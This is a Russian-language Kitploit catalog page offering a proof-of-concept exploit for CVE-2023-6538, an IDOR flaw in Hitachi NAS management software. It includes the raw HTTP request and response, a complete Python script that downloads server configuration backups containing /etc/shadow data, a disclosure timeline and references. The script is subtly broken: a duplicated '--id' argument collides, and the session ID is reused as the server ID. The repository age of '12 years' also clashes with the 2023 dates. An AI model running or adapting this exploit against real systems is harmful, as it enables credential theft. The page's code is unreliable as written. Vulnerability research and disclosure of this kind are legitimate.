Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/arszilla/cve-2023-6538
РазведкаАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийСбор информацииТестирование на Проникновение
GitHubarszilla/cve-2023-6538

CVE-2023-6538

Доказательство концепции эксплуатации CVE-2023-6538, уязвимости IDOR в системе управления Hitachi NAS, позволяющей непривилегированным пользователям загружать резервные копии конфигурации сервера, содержащие конфиденциальные данные.

Репозиторий
12 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2023-6538

CVE-2023-6538 — это Insecure Direct Object Reference (IDOR) уязвимость, обнаруженная в функции Configuration Backup & Restore System Management Unit (SMU) Hitachi NAS (HNAS). Данная уязвимость затрагивает версии SMU до 14.8.7825.01.

Эксплуатация

Данный эксплойт требует, чтобы злоумышленник имел контроль над учетными данными учетной записи, не являющейся Read-Only или Global Administrator, а именно:

  • Storage Administrator
  • Server Administrator
  • Server + Storage Administrator

По замыслу, пользователи с ролью Global Administrator должны иметь доступ к функции Configuration Backup & Restore SMU, расположенной по адресу https://<HOSTNAME/FQDN/IP>/mgr/app/template/simple%2CDownloadConfigScreen.vm?serverid=1, и отправлять следующий запрос, который создает и загружает резервную копию конфигурации выбранного сервера (т.е. сервера, подключенного к SMU):

root@kitploit:~
GET /mgr/app/template/simple%2CDownloadConfigScreen.vm?serverid=1 HTTP/1.1
Host: REDACTED
Cookie: JSESSIONID=REDACTED; JSESSIONIDSSO=REDACTED
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Dnt: 1
Referer: https://REDACTED/mgr/app/action/serveradmin.ConfigRestoreAction/eventsubmit_doperform/ignored
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

При успешном выполнении запроса SMU отвечает следующим ответом и начинает загрузку registry_data.tgz:

root@kitploit:~
HTTP/1.1 200 
Cache-Control: PRIVATE
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Strict-Transport-Security: max-age=31536000;includeSubDomains
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
P3P: CP="NOI DSP CUR ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Pragma: cache
Content-Disposition: attachment;filename=registry_data.tgz
Content-Type: application/download
Content-Length: 3169247
Date: Fri, 14 Apr 2023 09:30:03 GMT
Connection: close
Server: SMU

[DATA]

Однако из-за недочета в бизнес-логике SMU злоумышленник, имеющий доступ к учетной записи Storage Administrator, Server Administrator или Server + Storage Administrator, может обновить куки JSESSIONID и JSESSIONIDSSO так, чтобы они соответствовали кукам пользователя, которыми он владеет, что позволяет ему загрузить архив конфигурации. Кроме того, злоумышленник может также изменить параметр serverid в запросе, чтобы перечислить и загрузить архивы конфигурации различных серверов, подключенных к SMU.

Таким образом, сценарий, подобный CVE-2023-6538.py, может быть использован для эксплуатации этой уязвимости:

root@kitploit:~
#!/usr/bin/python3
#
# Title:            Hitachi NAS (HNAS) System Management Unit (SMU) Configuration Backup & Restore IDOR Vulnerability 
# CVE:              CVE-2023-6538
# Date:             2023-12-13
# Exploit Author:   Arslan Masood (@arszilla)
# Vendor:           https://www.hitachivantara.com/
# Version:          < 14.8.7825.01
# Tested On:        13.9.7021.04     

import argparse
from os import getcwd

import requests

parser = argparse.ArgumentParser(
    description="CVE-2023-6538 PoC",
    usage="./CVE-2023-6538.py --host <Hostname/FQDN/IP> --id <JSESSIONID> --sso <JSESSIONIDSSO>"
    )

# Create --host argument:
parser.add_argument(
    "--host",
    required=True,
    type=str,
    help="Hostname/FQDN/IP Address. Provide the port, if necessary, i.e. 127.0.0.1:8443, example.com:8443"
    )

# Create --id argument:
parser.add_argument(
    "--id",
    required=True,
    type=str,
    help="JSESSIONID cookie value"
    )

# Create --sso argument:
parser.add_argument(
    "--sso",
    required=True,
    type=str,
    help="JSESSIONIDSSO cookie value"
    )

# Create --id argument:
parser.add_argument(
    "--id",
    required=True,
    type=str,
    help="Server ID value"
    )

args = parser.parse_args()

def download_file(hostname, jsessionid, jsessionidsso, serverid):
    # Set the filename:
    filename = "registry_data.tgz"

    # Vulnerable SMU URL:
    smu_url = f"https://{hostname}/mgr/app/template/simple%2CDownloadConfigScreen.vm?serverid={serverid}"

    # GET request cookies
    smu_cookies = {
        "JSESSIONID":       jsessionid,
        "JSESSIONIDSSO":    jsessionidsso
        }

    # GET request headers:
    smu_headers = {
        "User-Agent":                   "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0",
        "Accept":                       "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
        "Accept-Language":              "en-US,en;q=0.5",
        "Accept-Encoding":              "gzip, deflate",
        "Dnt":                          "1",
        "Referer":                      f"https://{hostname}/mgr/app/action/serveradmin.ConfigRestoreAction/eventsubmit_doperform/ignored",
        "Upgrade-Insecure-Requests":    "1",
        "Sec-Fetch-Dest":               "document",
        "Sec-Fetch-Mode":               "navigate",
        "Sec-Fetch-Site":               "same-origin",
        "Sec-Fetch-User":               "?1",
        "Te":                           "trailers",
        "Connection":                   "close"
        }

    # Send the request:
    with requests.get(smu_url, headers=smu_headers, cookies=smu_cookies, stream=True, verify=False) as file_download:
        with open(filename, 'wb') as backup_archive:
            # Write the zip file to the CWD:
            backup_archive.write(file_download.content)

    print(f"{filename} has been downloaded to {getcwd()}")

if __name__ == "__main__":
    download_file(args.host, args.id, args.sso, args.id)

Обоснование оценки CVSS v3.1 в 7.6 можно лучше понять, изучив registry_data.tgz:

root@kitploit:~
$ tree -a
.
├── backup.properties
├── registry5.11.db1
├── registry5.13.db1
├── registry5.14.db1
├── registry5.15.db1
├── registry5.1.db1
├── registry5.2.db1
├── registry5.3.db1
├── registry5.4.db1
├── registry5.5.db1
├── registry5.6.db1
├── registry5.7.db1
├── registry5.8.db1
└── registry5.db1

1 directory, 14 files

Архив .tgz содержит различные настройки и информацию о сервере, подключенном к SMU:

registry5

Как видно на отредактированном изображении выше, registry5.db1 содержит содержимое файла /etc/shadow (найденное с помощью регулярного выражения) выбранного сервера.

Примечания

Эта уязвимость является "родственной уязвимостью" по отношению к CVE-2023-5808.

Ссылки

  • CVE-2023-5808
  • CVE-2023-6538
  • Бюллетень безопасности Hitachi Vantara для CVE-2023-6538

Хронология

  • 2020-04-12 - Уязвимость обнаружена
  • 2023-04-20 - Уязвимость сообщена на [email protected]
  • 2023-08-11 - Первоначальное присвоение номера CVE
  • 2023-12-06 - Номера CVE переназначены
  • 2023-12-11 - Номера CVE переназначены
  • 2023-12-11 - CVE опубликован
  • 2023-12-13 - Публичное раскрытие
Скачать инструмент